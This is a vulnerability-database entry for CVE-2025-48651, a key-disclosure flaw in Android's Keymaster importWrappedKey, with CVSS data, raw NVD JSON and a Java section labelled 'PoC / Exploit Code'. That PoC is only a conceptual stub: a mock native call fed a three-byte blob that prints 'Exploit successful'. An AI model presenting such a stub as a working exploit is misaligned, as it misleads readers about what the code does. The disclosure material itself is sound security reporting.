Security Vulnerability Report
CVE-2025-48651 CVSS 5.5 MEDIUM

CVE-2025-48651

Published: 2026-04-06 19:16:26
Last Modified: 2026-04-13 21:16:23

Description

In importWrappedKey of KMKeymasterApplet.java, there is a possible way to access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android (versions prior to the 2026-04-01 security patch release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// Conceptual PoC for CVE-2025-48651
// This code simulates the interaction with the vulnerable Keymaster Applet
import android.security.keymaster.KeymasterException;
import android.security.keymaster.KeymasterArguments;
import android.security.keymaster.KeymasterBlob;

import java.util.Arrays;

public class VulnerableKeymasterExploit {

    public void exploitImportWrappedKey() {
        try {
            // Prepare arguments for the importWrappedKey call
            KeymasterArguments args = new KeymasterArguments();

            // Simulate a malformed or crafted key data blob
            // that bypasses the weak input validation in KMKeymasterApplet
            byte[] craftedKeyData = new byte[] {0x00, 0x01, 0x02}; // Malformed payload
            KeymasterBlob wrappedKey = new KeymasterBlob(craftedKeyData);

            // The vulnerable method does not validate 'wrappedKey' strictly enough
            // allowing access to restricted keys.
            // In a real scenario, this would interact with the hardware keystore HAL.
            byte[] result = importWrappedKey(args, wrappedKey);

            // Arrays.toString prints the byte values; toString() on a byte[] prints only the object identity
            System.out.println("Exploit successful. Leaked key data: " + Arrays.toString(result));
        } catch (KeymasterException e) {
            System.err.println("Exploit failed: " + e.getMessage());
        }
    }

    // Mock method representing the vulnerable native/hal call
    private native byte[] importWrappedKey(KeymasterArguments args, KeymasterBlob wrappedKey)
            throws KeymasterException;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48651", "sourceIdentifier": "[email protected]", "published": "2026-04-06T19:16:25.867", "lastModified": "2026-04-13T21:16:23.373", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In importWrappedKey of KMKeymasterApplet.java, there is a possible way access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/docs/security/bulletin/2026/2026-04-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}